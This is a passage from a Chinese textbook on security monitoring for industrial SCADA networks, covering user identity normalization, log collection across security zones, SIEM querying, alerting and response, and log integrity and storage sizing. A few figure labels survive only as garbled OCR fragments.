对于有关日志和信息安全事件的关联分析 非常有用(通常用于跟踪IP地址详细情况) 源和目 的端口 注意在非IP的工业SCADA 系统中,尽管网络通信将继续使 用特殊的工业控制系统专用网 络协议进行,网络流量将在RTU 或PLC设备的IP地址终止 可以使用IP地址辨识资产中的边界物理交 换机或路由器,甚至资产的地理分布位置(通 过地理位置服务) 6)用户身份和鉴别信息 对网络用户及其行为进行监视是一种清晰地掌握网络运行状态,及其所对应 的用户属性的理想办法。用户监视是网络运行合规性管理的重要内容,因为多数 合规性管理流程需要以用户权限、访问权限、角色和用户行为做基础的特殊控制 过程。 然而,“用户”一词的定义通常很模糊:存在账户名称、域名称、主机名称和标 识用户身份的名称等几种不同提法。用户身份名称在合规性管理中经常使用,而 账号名称在数字系统中经常使用。对网络用户的身份进行鉴别需要用户名和密 码、设备的标识名称,而标识名称是名字域中很多主机之一。应用程序自身也许会 认证并登录到其他后台系统(如数据库)中,该数据库系统有自己的名称及其他网 络系统申请访问该数据库所必须具有的其他授权证书。更复杂的情形是,同一个 操作人员需要从多个不同设备认证到多个系统,并且每次认证过程都可能使用独 立的用户名。 为每个普通用户赋予通用的身份标识是非常必要的,原因在于将普通的安全 事件进行分类管理是非常必要的。该过程可以通过监视大量网络数据源(网络、 主机和应用程序日志),提取网络中出现的所有用户身份信息,并将这些信息与网 络日志中可能出现的所有线索关联起来。例如,如果一个网络用户认证并登录一 台Windows 设备,接着发起认证并登录一个应用程序,于是该应用程序将向后台系 统发起认证请求。管理人员可以通过观测各种认证过程的起源和发生时间的方 法,跟踪并追溯这一系列网络行为直至用户名,因为这一系列行为是从同一个物理 控制台开始,并依次进行,因此可以认为所有这三个认证过程都是同一个用户完 成的。 由于控制系统越来越复杂,并多以分布式的形式出现,而且随着用户数量的不 断增加,每个用户都具有特定的角色和权限,系统用户的身份问题将变得非常复杂 和麻烦,因而需要设计一种用户身份的自动管理机制。 使用通用目录机制可以使该过程非常简单,例如微软的活动目录(Active Di-rectory)和/或轻量目录访问协议,可以作为身份目录和知识库。但是,每个网络用 户仍然具有很多特别的身份证书,困难在于缺乏一致的日志格式,并且在不同的系 统中缺乏通用的身份标识。针对用户的监测需要从不同的网络和应用程序日志中 提取用户信息,然后对这些身份信息进行归一化处理。例如,用户John Doe 也许 使用用户名j.doe 登录 Windows域,该用户的E-mail 地址是jdoe@company.com, 并使用johnnyd 用户名登录企业内网或企业经营管理系统等。为了真正意义上地 监视该用户的行为,正确识别出j.doe、jdoe 和 johnnyd 是同一个网络用户的功能是 非常必要的。 许多商用身份访问管理(IAM) 系统(有些情况下指的是身份和鉴别管理系 统)可以简化这种用户身份管理过程,典型的商用IAM系统包括:Novell、Oracle 身份 管理系统 (www.oracle.com/technetwork/middleware/id-mgmt/overview),Sun 的身份 管理系统(www.sun.com/software/index.jsp?cat =Identity%20Management&tab =3) 和 Tivoli身份管理系统(www.01.ibm.com/software/tivoli/products/identity-mgr)。 其他第三方身份管理解决方案,例如 Securonix 的身份匹配系统(www.Securonix. com) 可以使用从其他IAM 系统挖掘身份信息,及将所有信息规格化处理成通用 身份的技术提供集中目录和IAM的功能。很多先进的安全信息及事件管理系统 和日志管理系统也可以提供与身份相关的特征实现用户的常规管理。无论使用什 么方法,通过集中式IAM的方式管理和控制多层系统的鉴别问题,都可以提供权 威的身份标识源,如图5.24所示。 Window 登录:用户名johnDoe 应用程序登录:用户名jdoe 网络登录:用户名john@domain.com 姓名: johnDoe 员工ID:######## 权限: admin 认证区:0-4 Email:john.doe@domain.com Phone:XXx-XXx-XXx-xxx Usr: Pwd: 应用程序登录:用户名 commonApp 图5.24 归一化用户身份 基 于 工 业 S C A D A 系 统 安 全 城 的 信 息 安 全 技 术 及 应 用 一旦获取到必要的用户身份背景信息,就可以将这些信息应用于用户身份信 息和事件管理过程,最终为用户交换提供日志和事件参考。例如,图5.25中,安全 信息及事件管理系统(SIEM) 的仪表盘显示与源用户相关的所有网络和事件的 细节。 图5.25 安全信息及事件管理(SIEM)系统显示的用户行为相关的文件访问过程 7)额外的上下文信息 因为用户身份是上下文信息相关的典型内容,因而有大量额外信息可以提供 上下文。这些信息包括脆弱性参考、IP 地址列表和威胁目录等,可以使用附加的、 有价值的上下文信息对所监视到的日志和事件情况进行补充。上下文相关的背景 信息的例子如表5.16所列。 表5.16 上下文信息源及其相关性 信息源 提供的上下文信息 信息安全含意 目录服务(例如活 动目录) 用户身份信息,资产身份信息, 和访问权限 提供可以增强安全威胁分析和探测,以及 合规性的已知用户、资产和角色的知识库 身份和鉴别认证 管理系统 详细的用户身份信息,用户名和 账户及别名,访问权限,认证行为 的审计踪迹 将用户访问以及基于权限和策略的行为 关联起来。当应用于丰富安全事件库时,该 系统还可以提供用于合规性审计所必需的、 清晰的、权威审计信息 脆弱性扫描 资产细节包含操作系统、正在运 行(端口和服务)的应用程序、补 丁、已确定的脆弱性和其他相关的 已知行为 使得信息安全事件可以基于其目标系统 的脆弱性进行加权处理(如Windows病毒在 Linux操作系统平台上的影响将不明显)。 也可以提供用于异常报告、事件关联性和 其他功能的脆弱性细节信息 ( 续 ) 信息源 提供的上下文信息 信息安全含意 渗透性测试工具 开发成功/失败,开发方法,躲避 技术等 如同使用脆弱性扫描工具一样,渗透性测 试工具提供从攻击者角度的测试场景,而不 像普通的脆弱性扫描结果那样仅能显示哪 些目标可能会受到攻击;渗透性测试可以显 示哪些目标已经受到攻击,该功能对于分析 逃避技术,探测异形代码等非常有用 威胁数据库/CERT 细节,起源和对开发过程、病毒, 躲避技术修补的建议 威胁情报可以仅用于单纯的咨询服务(例 如将已发现的威胁素材作为培训数据提 供),或者用于分析过程(例如将脆弱性扫描 的数据与一个已经发现的威胁的严重程度 关联起来) 威胁情报也可以当做“参照系”使用,提供 一种将威胁进行前后参考对照的依据,目的 在于强调或收集特殊类型的威胁及其严重 程度信息等 上下文信息一般非常有用,对某些事件或某组事件的可用上下文信息越多,评 估相关的信息安全和交易流程将越容易,这种情形是非常正确的,因为所监视的日 志和事件常常缺乏关联性方面的细节,如用户名等,如图5.26所示。 另一方面,上下文信息也可以添加到总的、已经评估过的信息中,就这一点而 言,当将这些信息以自动方式用于丰富其他安全信息时将非常有用。 8)行为分析 此处描述的行为并不是指能直接监视的网络行为,而是对一段时间内所有监 视到的现象(从日志、网络流量或其他数据源)进行的分析判断。这种分析结果表 明预期和非预期的行为,对于很多类型的安全功能都特别有用,这些安全功能包含 基于异常分析的威胁检测,以及基于性能或阈值的告警等。网络行为分析在信息 安全事件关联方面也是非常有用的条件。 网络行为分析功能一般由安全日志和事件监视工具提供,例如日志管理系统, 安全信息及事件管理系统,和网络行为异常探测系统。如果用于采集和监视安全 信息的系统不能提供网络行为分析功能,就需要配置诸如电子数据表格或统计程 序等其他额外工具。 5.3.2 监视工业控制系统信息安全域 明确具体需要监视工业 SCADA 系统中的哪些内容仅仅是第一步,事实上仍 然会发生监视所有用户、网络、应用程序、资产和其他网络活动的情况。对于需要 监视哪些内容的讨论主要集中于日志方面,因为日志文件主要设计为描述已经发生的活动,日志文件普遍存在于网络资产中,并被用户所熟知。但是,日志文件却 并不总是可靠的,在有些情况下日志文件记录的细节并不全面。于是,监视信息安 全区域通常需要下列方法,包括: ① 日志采集和分析; ② 直接监视或网络探测; ③ 借助其他系统进行辅助性监视。 除那种日志可以由资产和网络设备直接产生并可直接采集日志的情形外,需 要特殊的工具监视不同的网络系统。此外,无论采用什么技术手段进行监视的结 果都需要进行分析整理,尽管可以手动完成日志和事件的后期处理(很多合规性 管理规定都允许该操作),因为自动化工具非常有效果,所以推荐使用。 但是,对所监视的系统进行集中分析处理与基于功能集合隔离构建的信息安 全模型不同。也就是说,工业控制系统网络必须分隔成多个功能安全域,而集中监 视过程需要将日志和安全事件数据局限于一个功能集合中(将信息集中在一定知 悉范围内,或在安全域之间共享),却潜在地增加了安全域的风险。在第一种情形,工业控制系统的日志和事件信息不允许穿越安全域的边界,仅允许在安全域的 本地系统中进行采集、维护和分析。而在第二种情形,在日志和事件数据穿越信息 安全域边界进行传输时需要设计特殊的防护手段,防止遭受新的来自网络内部的 攻击。通常的做法是部署特殊的安全控制技术措施(可以是数据二极管、单向网 关或明确配置拒绝所有内部通信连接策略的防火墙),以确保安全数据只能在集 中管理的网络系统区域中流动。特别在工业 SCADA 系统网络中,关键的生产控 制系统一般分布在远方位置并需要确保运行可靠,可以运用综合两者的方法解决 该问题, 一是提供本地安全事件和日志采集与管理,确保安全域可以相对隔离的方 式运行;另一方面,将信息安全数据传送至中心控制系统,促使中心控制系统掌握 更完整的、跨越多个安全域的全网络运行情况。 1)日志采集 日志采集指的是从所有可能产生数据的源头搜集数据。多数情况下,这是一 件将日志信息引导输出至一个日志汇集节点的活动,例如一个网络存储设备和/或 一种专用的日志管理系统。引导日志记录输出的过程如同将系统日志输出至一台 数据集中设备的IP 地址一样简单。在有些情况下,例如 Windows的 WMI 系统,事 件存储在本地数据库而不是日志文件中。这类事件数据必须重新处理,可以直接 处理(认证登录到 Windows系统并请求查询事件数据库)也可以间接处理(通过软 件代理程序如 Snare, 可以在本地重新处理事件信息并将这些信息通过标准的系统 日志进行传输)。 2)直接监视 直接监视指的是利用网络探针或其他设备直接检查网络流量或主机,直接监 视技术对于监测那些本身不生成日志的系统非常有用(很多工业控制系统网络资 产如 RTU,PLC 和 IED等都属于这种情况),也可以用于确认日志文件记录的网络 行为的正确性,因为日志文件可能会遭到攻击者的蓄意修改,目的是隐藏攻击者的 恶意攻击行为。通常的网络监视设备包括防火墙、入侵检测系统(IDS)、数据库行 为监视系统(DAM)、应用程序监视和网络探针,这些工具可以是商用软件或应用 程序,或开源软件如Snort(一个可从 www.snort.org 网站下载的入侵检测系统)、 Wireshark(一种可以从 www.wireshark.org 网站下载的网络嗅探和流量分析工具) 和无线网络嗅探工具 kismet(www.kismetwireless.net)。 通常情况下,网络监视设备自身都会产生日志,这些日志可以和其他日志一起 用于分析过程。因为这些日志的生成与所监视的系统无直接联系,网络监视设备 有时也称为“被动日志”设备。例如,数据库行为监视器监听网络中的数据库行 为,通常位于网络边界端口或网络镜像端口。数据库行为监视系统分拆网络数据 包并提取相关的 SQL(结构化查询语言)交易记录生成日志信息。数据库行为监 视系统却没有必要登录数据库本身,所以不会影响数据库服务器性能。 在工业 SCADA 系统网络中,同样可以监视网络中使用的工业控制系统专用协议应用情况,为那些不支持日志记录功能的工业控制系统资产提供“被动日 志”。被动监视技术在工业控制系统专用网络中特别有用,因为很多工业控制系 统协议工作在实时控制模式,对网络时延高度敏感。这也就是在工业控制系统生 产控制设备中设计日志记录功能模块非常困难的一个重要原因(还可能使得资产 测试策略变得非常复杂),被动型网络日志成为一种理想的解决方案。 有些情况下,网络设备会使用专用的日志格式或事件描述协议,并且需要经过 特殊的处理流程。例如,Cisco安全设备事件交换协议(SDEE) 应用于大多数 Cisco 的入侵防护产品,需要用户名和密码与安全设备进行鉴别认证过程,进而可以按照 需求对网络事件进行追溯,或者按照“需求—订购”模型主动“推送”事件。这两种 方法的结果是相同的,因而理解系统日志并非绝对无处不在的概念非常重要。 3)推测型监视 推测型监视指的是通过监视一个系统进而推测其他系统相关信息的情形,例 如,很多应用程序连接到一个数据库,对该应用程序所运行的数据库进行监视,可 以提供关于该应用程序如何应用方面的、很有价值的信息,即使该应用程序本身并 不生成日志或没有直接被应用程序监视器监视。 基于网络的监测不可避免地会导致一些问题,如能否监视已加密的网络流量? 很多工业控制系统网络管理条例和规范推荐对生产控制数据进行加密。那么这些 数据将如何使用网络探针进行监视?虽然目前有很多种技术可供选择,但每种技 术都有优点和缺点。第一种技术就是监听加密站点和通信源头之间的敏感网络连 接。也就是说,加密网络通信过程需要使用外部专用的网络加密系统进行处理,需 要将网络探针直接设置在资产和加密通信站点之间。这种方法虽然提高了效率, 但从技术上讲却削弱了网络的安全性。第二种技术是使用专用的、基于网络的解 密设备,例如Netronome 公司的 SSL 检查工具。该设备使用经过周密设计的、基于 硬件的中间人攻击方法突破加密过程并分析网络内容,以此来测试网络的安全性。 第三种技术是并不监视整个加密的流量,而是监视那些将来可能会被加密的数据 (例如,工业控制系统专用协议的功能代码),而那些不会被加密的敏感数据流,将 不产生异常报警提示。 为最终确定具体需要什么工具,从分析待监视目标的安全域边界和内部安全 控制措施开始,并确认哪些可以产生足够的监视信息、哪些不能。如果这些工具可 以完成该功能,将首先从网络边界区域(在最小关键安全域和互联网之间——一 般指的是企业内部局域网)开始采集日志,并汇集到一个集中日志采集工具中。 接下来,从那些保护最重要的安全域中的设备开始收集日志,并逐渐向外延伸,直 至全部有价值的监视活动都完成,或者直至达到日志采集容量的饱和状态。从这 个意义上讲,如果仍然剩下关键资产尚未被高效地监测,那么增加日志采集系统的 容量将非常有必要。(增加日志采集系统的容量并不总意味着购买更大规模的, 更昂贵的采集设备。分布式处理也是一种可行的选项,在本地的信息安全域内或者在一组相似的安全域内完成所有的日志采集功能,并将每个安全域采集的数据 汇总到中央采集设备中进行集中日志分析和报告。尽管该类事件整理过程将减少 对威胁探测效率的影响,并将从中央控制系统生成更少的综合报告,所有必要的监 视和日志采集过程将在安全域内保持活动状态,并可以根据需要进行存储。) 如果将所有日志都采集起来,但仍然剩下关键资产没有得到充分地监视,增加 额外的网络监视工具进行补偿是非常必要的,该过程如图5.27所示。 图5 . 27 使用信息安全域监视操作的流程 额外的监视工具包括任意的资产或网络监视设备,例如基于主机的安全代 理,及其他网络外部的辅助系统如入侵检测系统、应用程序监视器或者工业控制系 统协议过滤器等。基于网络的监视工具通常比较容易部署,因为它们的本性就是 非显而易见的,而且如果将这些工具用于监视跨网或镜像网络,也不会引发明显的 网络延迟。 当采集日志时,严格注意区分所有已经建立起来的安全域边界是非常必要的。 如果需要跨安全域采集日志(对于检测攻击源非常有帮助,因为攻击行为通常会 跨安全域),必须确认安全域的边界参数配置成只允许日志以单方向的形式记录,否则,安全域的边界将被破坏。大多数情况下,对于一台特定的设备而言,为实现 严格的单向日志文件传输规则,简单地生成关于仅允许源(生成日志的设备)和目 的(日志集中的设备)单向通信的策略已经足够了。对于重要的信息安全域而言, 为确保所有的日志传输都发生在一个方向,使用数据二极管或单向网关进行物理 隔离是非常必要的,因为该机制确保没有任何恶意流量可以从日志生成设备进入 信息安全域。[60] 4)信息采集和管理工具(日志管理系统) 日志采集设备是一种典型的日志管理系统或安全信息和事件管理系统(SI- EM), 这些工具包含极为简单和复杂的系统、开源和商用解决方案。这些解决方案 包括系统日志采集和日志搜索,商用日志管理系统,开源安全信息管理系统(OS- SIM)以及商用安全信息和事件管理系统。 (1)系统日志采集和日志搜索。系统日志使得日志文件可以在网络中传输, 通过将所有系统日志的输出从所支持的资产重定向到常规的网络文件系统,可以 建立一个简单和开放的日志采集系统。由于低成本的优势(特别便宜),就使用所 采集的日志进行分析而言,该解决方案不会增加太多的负担,仅需要使用诸如开源 日志搜索或 IT搜索工具、商用日志管理系统或安全信息和事件管理系统(SIEM) 等附加工具即可实现。此外,如果日志被搜集起来用于合规性的用途以及安全监 视,则需要额外的措施确保实现日志保留要求。这些要求包括不可否认性和监管 链,目的是确保文件不会被更改,或被未授权用户访问。此外,这些功能可以不借 助商用系统实现,而是需要IT 管理员付出更多的努力。 (2)日志管理系统。日志管理系统提供一种日志采集、分析和报告的商用解 决方案。日志管理系统提供了一个配置接口,用于管理日志采集以及对日志的存 储,使得管理员可以配置针对每个独立日志源的日志保持参数。在日志采集时,日 志管理系统也可以提供必要的抗抵赖性功能以确保日志文件的完整性,例如那些 带有哈希(Hash) 散列算法的“签名”日志可以在后期当作文件的校验使用。 一旦 采集到日志,这些日志将可用于分析和搜索目的,并可以经过预先过滤处理,生成 与某种特殊目的或功能相关的日志数据报告,例如合规性报告,这种报告将生成与 一种或很多种合规性控制相关的日志细节,如图5.28所示。 (3)安全信息和事件管理系统。安全信息和事件管理(SIEM) 系统,扩展了日 志管理系统的功能,使其具有特别的分析和上下文背景关联功能。 一份美国高德 公司的安全分析报告表明,安全信息和事件管理系统的最大特点是,该系统可以将 日志管理或传统的信息安全管理系统(SIM) 的日志管理和合规性报告功能与安全 事件管理系统(SEM) 的实时监视和事件管理能力结合起来。更进一步的情况是, 安全信息和事件管理系统必须支持从异构的数据源(包括网络设备、安全设备、安 全程序和服务器等)捕获数据的能力。使得 SIEM 系统成为一个可以跨安全域边 界和内部提供态势感知能力的理想平台。 图5 . 28 典型的日志管理操作过程 市 场 上 有 很 多 SIEM 产 品 相 互 竞 争 , 包 括 开 源 的 OSSIM 项 目 (www.sourceforge.net/projects/os-sim/), 以及很多商用的 SIEM 产品,这些产品 或解决方案提供了大量有价值的特点和功能。 因为 SIEM 系统主要设计为支持实时监视和分析功能,所以该系统在搜集信 息的同时还将解析日志文件的内容,并将已经解析好的数据以结构化数据的形式 存储起来,通常是数据库或特殊的无格式存储系统。通过解析通用数据操作,将更 适合用于分析,并支持 SIEM 系统的实时功能,如图5.29所示。 图5 . 29 典型的安全信息和事件管理系统操作 已经解析过的数据主要用于分析,而未经处理过的日志数据主要通过一种传 统的日志管理框架进行隔离式管理,并且该框架将对日志数据进行哈希散列处理并保持数据的合规性。因为原始日志文件有可能需要用于法庭计算机调查取证, 日志文件和已经解析过的事件数据之间的逻辑联系必须在数据存储结构中得以 保持。 SIEM 系统平台一般应用于安全运行中心,为信息安全员提供安全事件检测和 响应方面的情报支持。 一般情况下,SIEM 系统将提供可视化的仪表盘,将大量不 同格式的数据简化成更具有可读性的数据形式。 日志管理系统、SIEM 系统都是为满足信息安全需求而设计的,并且更加紧密 地结合在一起以满足合规性方面的要求。许多传统的日志管理产品现在都支持 SIEM 系统功能,但传统的 SIEM 系统产品却仅支持日志管理功能。 (4)数据历史记录。数据历史记录并非安全监视产品,但它却可以完成监视 操作并以多种方式为安全监视解决方案提供有用的补充,包括: ① 提供普通的网络监视工具所不具备的,针对工业控制系统资产的可视化 能力; ② 提供对于安全分析而言非常有价值的处理效率和可靠性方面的数据。 因为多数安全监视工具是为企业网络应用而设计的,它们一般局限于TCP/IP 数据网络,因而对大多数工业控制系统设备并不具备处理能力,工业 SCADA 系 统 设备主要使用串口连接或其他非路由协议。但是,随着越多越多的工业控制系统 协议使用以太网和/或TCP/IP 网络通信,工业生产控制过程也将会受到企业网络 行为的影响。通过由数据历史记录提供的操作数据,SIEM 系统的安全分析功能也 可以对工业生产控制数据发挥作用,使得起源于IT 数据网络环境而以工业控制系 统网络为目标的攻击威胁行为(例如“震网”)更容易被探测到,并更容易被安全分 析人员跟踪处理。此外,通过将IT 数据网络的度量标准扩展到工业控制过程,那 些有可能影响工业生产自动控制系统性能和可靠性的行为也可以被检测并被发 现。例如,突然增加的网络流量、较高的网络延迟性或其他可能影响工业控制系统 网络协议的正常运转的行为。 5)监视跨安全域边界的行为 跨越安全域边界监视系统行为是非常必要的,实现这种功能要求安全域边界 的安全策略允许所监视的目标设备产生的安全日志和事件传输至中心管理控制系 统。数据二极管非常适合完成此类功能,因为数据二极管可以确保信息的单向传 输,可以和安全域分离并以中心管理系统为目标。如果网络中使用了防火墙,则任 何日志和事件中的“空白区域”将表示一种潜在的攻击行为,配置参数必须通过IP 地址和端口严格地限制从源端到目标管理系统的通信会话,切断任何可能存在的通 信回路。理想情况下,因为网络中传输的信息非常敏感,这种通信过程应该被加密。 5.3.3 信息管理 在信息安全监视领域,成功搜集必要信息的下一个步骤是应用已经采集到的、相关的安全信息。正确分析这些信息将提供探测可能影响工业控制系统网络安全 性和可靠性的攻击事件,所必需的态势感知能力。 理想情况下,SIEM 系统或日志管理工具将自动完成很多基本的检测功能(包 括标准化、数据压缩和关联处理),在其操作范围内为安全分析员提供下列类型的 信息: ① 监视相关系统和服务生成的原始日志和事件细节,归一化处理为同一类 数据。 ② 从原始数据中产生的大量事件或更复杂的威胁。 ③ 与观察到的原始事件和由此产生的相关事件相关的、必要的背景信息。 一般情况下,SIEM系统将在其仪表盘或控制面板中显示高级的、分层次的可 用信息,如图5.30所示。 global_admin Metrics ☑D aD 2D 0日 glha 图5.30 开源信息安全管理项目 该图显示的是开源信息安全管理项目的控制面板。利用这些信息,可以自动 和手动进行交互操作。这些信息可以直接查询,以便直接获取特定问题的答案;可 以配置成一个满足特定业务要求的报告、策略或合规目标;可以主动或被动地通知 安全管理员或项目管理员一起事故的信息;以及可以被用于对已经发生的事件进 行深度调查。 1)查询 查询操作指的是从集中式数据存储结构中请求信息。有些情况下,此类操作 是一种纯粹的数据库查询操作,使用结构化查询语言,或者是一种纯文本的请求, 使得用户可以很方便地访问信息而不需要具备数据库管理技术(尽管这些请求也 许会在内部、向用户隐藏地使用 SQL查询)。初始查询的一般例子包括: ① 前十个用户(所使用的、总的网络带宽); ② 热点用户(独特的连接或网络流量); ③ 热点事件(频率); ④ 热点事件(重要性); ⑤ 一段时间内的热点事件; ⑥ 正在使用中的热点应用程序; ⑦ 开放端口。 这些请求可以针对任何或所有数据库中可用的数据。查询可以通过限定条件 或过滤器的方式进行聚焦,从而使查询结果与特定的需求更相关。例如: ① 在非工作时间外的10个热点用户; ② 使用特定的工业控制系统协议的热点用户; ③ 某一类型的所有事件(如用户账户更改); ④ 针对某种特定资产或资源的事件(例如,指定信息安全域中的关键资产); ⑤ 指定资产或资源使用的所有端口和服务; ⑥ 在不只一个信息安全域中使用的热点应用程序。 查询结果可以通过多种方式返回,如带分隔符的文本文件、通过图形用户界面 或控制面板、通过预先定义格式的可执行报告、通过一个文本或邮件传送的告警 等。图5.31 显示由特定类型的事件过滤条件形成的用户行为。 图5.31 安全信息和事件管理系统的控制面板显示管理员账号的改变 在该例子中,管理员账户更改行为符合NERC 的合规性要求。 SIEM系统的一个特别的功能是将事件关联起来,进而发现那些重大的事故, 该项功能包括完整定义相关的规则,以及将相应的结果通过控制面板显示出来。 图5.32显示一个图形化的用户事件关联编辑器生成的逻辑条件(例如“if A and B then C”)。而图5.33显示事件查询请求的结果,所选择查询的事件(一个 HTTP 指令和垃圾邮件)是由四个离散事件生成的。 曰 c element ar camponenthere to add or gomporant here to add 图5.32 利用图形用户界面生成事件关联规则的例子 wrnt anhl ltna fant 11at lte 图5.33 安全信息和事件管理系统控制面板显示相关事件及其来源情况 2 ) 报 告 报告选择、组织,并将所有从丰富的日志和事件中获取的相关数据形成一个独 立的文档。报告提供了一种非常有用的方式来表示几乎任何类型的数据,从高级 管理人员的高层次的事件总结,到全面而精确的文档所提供的用于内部审计或合 规性管理所需要的微小细节。由SIEM 系统产生的报告的实例如图5.34所示,该 图提供了PI 验证失败和节点变化行为的快速总结。 3 ) 告 警 告警是对 SIEM 系统内可观测条件的动态响应,告警可以是控制面板或仪表 盘的可视化的通知信息,也可以是与安全管理员的直接通信(E-mail 、 页面、文本 信息等),或甚至是客户端执行的脚本。商用安全信息和事件管理系统经常使用 的告警机制包括: (1)可视化的指示器(如红色、橘色、黄色、绿色)。 (2)用户或用户组的直接显示。 Industrial Incidents Report Generated:Mar 4,20111:57 PM Time Zone:Greenwich Mean Time:Dublin Edinburgh,Lisbon, London GMT+00:00 Report Period 2011/01/010100:00 to Device Count:49 Incident Overview Average Severity User and Asset Details 2011/04/0100:00:00 incidents PI-Failed Lic … PI-Shutdown … PI-Trust Gra. PI-Failed Lo … PI-Point Del … PI-Point Cre PI-Point Alte … PI-Mismatch … PI-Feiled Tra PI-Out of Ra.. 图5.34 安全信息和事件管理系统报告显示的工业控制系统行为 (3)产生并将特定报告向用户或用户组发送。 (4)审计控制专用的告警行为内部日志。 (5)客户端脚本或其他外部控制指令的执行。 (6)黑白控制面板或事件管理系统操作票的产生。 很多合规性要求,包括 NERC CIP,CFATS和 NRC RG5.71,需要事件与组织内 和/或组织外合适的权威机构进行交互。通过产生一种可用性强的,或可以和 SI- EM 系统进行适当通信的变量或数据字典,SIEM系统的告警机制可以通过自动生 成合适的报告促进这种交互过程,并将这些报告传递给重要员工。 4)事件调查和响应 SIEM 系统以及日志管理系统对于事件响应而言非常有用,因为数据结构和标 准化,允许一个事件响应处理团队可以深入研究一个特定事件,并发现更多的细节 (通常可以深入分析源日志文件内容和/或已捕获的网络数据包),并可以依据特 定的数据字段发现其他相关的行为。例如,如果当前有一个事件需要进行调查和 响应,可以对该事件进行调查,相关的细节诸如用户名、IP 地址等可以被快速识别 出来。可以通过查询 SIEM 系统的方式,确定与用户名、IP 地址等有关的其他 事件。 有些情况下,SIEM 系统可以支持动态响应能力,包括: (1)支持使用SNMP直接从交换机或路由器接口进行配置,使网络通信中断。 (2)在网络基础环境中执行脚本与设备进行交互,实现重定向路由流量,隔离 用户等。 (3)通过执行脚本的方式与边界安全设备(例如防火墙)交互,达到阻断那些 已经被发现是可疑的网络流量的目的。 (4)运行配置脚本与目录或身份访问管理系统进行交互,达到更改或阻止一 个用户账号,以此响应那些已观察到的恶意网络行为。 这些响应过程可是手动或自动方式,也可以两种都支持。因为自动响应能力 可以提高效率,这种响应能力只能限制于非临界性的安全域和/或安全域边界,并 且所有自动响应能力需要谨慎设计,并在实施之前进行测试。 一个错误的响应可 能触发此类响应并导致工业生产控制操作的错误,引发潜在的、非常严重的 后果。[61] 5.3.4 日志存储和维护 信息安全监视、日志采集和丰富的最终结果是产生大量日志文件形式的数据, 并将这些数据存储起来用于审计和合规性目的(主要用于直接监视代替日志采集 的情形,监视设备将持续产生日志,并被保存下来)。这种机制将带来很多的挑 战,包括如何确保被存储文件的完整性(合规性的基本要求),以何种形式在什么 位置存储这类文件,以及如何确保这些文件随时可用于安全分析用途。 1)抗抵赖性 抗抵赖性指的是确保一个日志文件没有遭到篡改的过程,该过程将保证原始 的日志文件可以当作证据使用,而不必考虑真实性问题,并且在法律允许的范围内。 抗抵赖机制可以通过很多途径实现,包含将采集到的日志文件进行数字签名当做校 验使用,使用受保护的存储介质,或使用第三方文件完整性监视系统(FIM)。 数字签名过程一般通过对实时采集的日志文件进行哈希计算实现,哈希计算 的结果可以对文件进行校验,确保该文件没有被篡改,如果文件以任何方式被修改,哈希计算将产生不同的数值,日志文件将不能正确完成完整性校验;如果校验 计算结果一致,将可以确认日志文件保持原始形式,未受到篡改。 使用合适的存储设备也可以完成抗抵赖性功能,例如使用一次写入多次可读 (WORM)设备,原始日志记录仅可以访问,但不能被修改,因为设备的写功能阻止 额外的保存操作。很多可管理型存储区域网络(SAN) 系统同样可以提供不同层次 的认证、加密和其他安全防护措施。 文件完整性监视系统早已被当做全面信息安全监视基础设施的一部分使用, 文件完整性监视系统观察日志存储设备的任何变化或修改情况,提供更深层次的 完整性检验过程。 2)数据保持/存储 上述提及的安全监视工具都需要信息安全信息的采集和存储,所需信息的数 量很容易在一个以近乎20000EPS(每秒事件数)的速率采集信息的中型规模企业 的8小时工作周期内超过170GB。 数据保持指的是长时间存储信息的数量,可以通过容量(采集日志的总字节 数)和时间(日志存储的年或月数量)尺度进行测量。日志保存时间的长度非常重 要,因为这个测量标准经常在合规性要求中定义,例如,NERC CIP 要求日志保存 的期限从90天到3年不等,依据日志的特点而定。通过确定哪些日志是合规性要 求所必需的,以及这些日志需要保存多长时间,可以计算出所需的物理存储空间数 量。需要考虑的因素包括: ① 识别正在生成的日志的数量; ② 判断平均日志文件的大小; ③ 判断日志维护所需的时间周期; ④ 判断正在使用的日志管理或 SIEM 系统支持的文件压缩比率。 表5.17说明不间断的日志收集速率如何映射进入保存超过7年的总体日志 存储量,导致少量千兆字节,到数百个千兆字节,甚至万兆字节的存储。 表5.17 一段时间内的日志存储需求 每秒日志 每天日志 /10° 每年日志 /10⁹ 平均字 节/事件 保存年限 日志大小 /TB 压缩字节 /TB(5:1) 压缩字 节/TB(10:1) 100000 8.64 3154 508 7 10199 2040 1020 50000 4.32 1577 508 7 5100 1020 510 25000 2.16 788 508 7 2550 510 255 10000 0.86 315 508 7 1020 204 102 5000 0.43 158 508 7 510 102 51 1000 0.09 32 508 7 102 21 11 500 0.04 16 508 7 51 11 6 依据工业控制系统企业或组织的特点,需要使用多种标准或规范维持审计线 索,通常满足不同的保持需求。例如 NERC CIP,依据日志自身的特点、事件是否发 生等,日志维护过程也将发生变化,所有这些因素增加了海量、长时间存储数据的 需求。因为安全事件优先等级往往会不同(特别是在一个安全事件中),确信可用 的存储结构具有足够的净空间,存储事件行为产生的突变非常有必要。 3)数据可用性 数据可用性不同于数据的可维护性,指的是分析过程中可以实际访问的数据 的数量,也称为“活动”或“在线”数据,数据的可用性决定并发分析时可用的信息 数量,以及容量(字节和/或事件总数)或时间。数据维护影响 SIEM 系统检测“低 级和缓慢”攻击(一段时间内发生的、目的性很强的、可以躲避检测的攻击行为)的 能力,如同运行趋势分析和异常检测一样。 为满足合规性标准要求,生成过去3年时间中一个安全域内的从安全域外部 发起的网络流量列表是非常必要的。为确保这类请求的成功执行,3年时间的网 络流量数据需要在SIEM 系统中立即可用。如果 SIEM 系统的数据可用性不充足 (例如仅仅只能保持数据在1年内的活跃度),存在一种工作模式,通过获取原有 的数据集,网络信息可以使用SIEM 系统的有效数据一致的形式存储。通过请求 活跃数据集合,可以获取部分结果。通过还原备份或档案文件,可以需要运行两种 额外的请求,产生1年内多种结果数据集,可以利用这些结果合成3年时间期的报 告。但是,这种机制需要分析人员付出额外的工作。此外, 一些合法的 SIEM 系统 的获取/修正过程将干扰或中断新的日志采集过程,直至整个过程结束。 数据保持过程可以由可用的数据存储容量限定范围(和硬盘驱动空间),与之 不同的是数据可用性受限于SIEM 系统所能使用的、用于分析的数据结构。依据 存储数据的特点,系统中可用数据的总量将限定于天数、月数或年数。 一般地,数 据库受到下列因素约束: ① 列的总数(索引或域); ② 行的总数(记录或事件); ③ 新信息嵌入的速率(例如采集速率); ④ 查询结果所需的速率(例如检索速率)。 取决于信息安全监视后端的商用和安全要求,为满足性能要求,将监视和分析 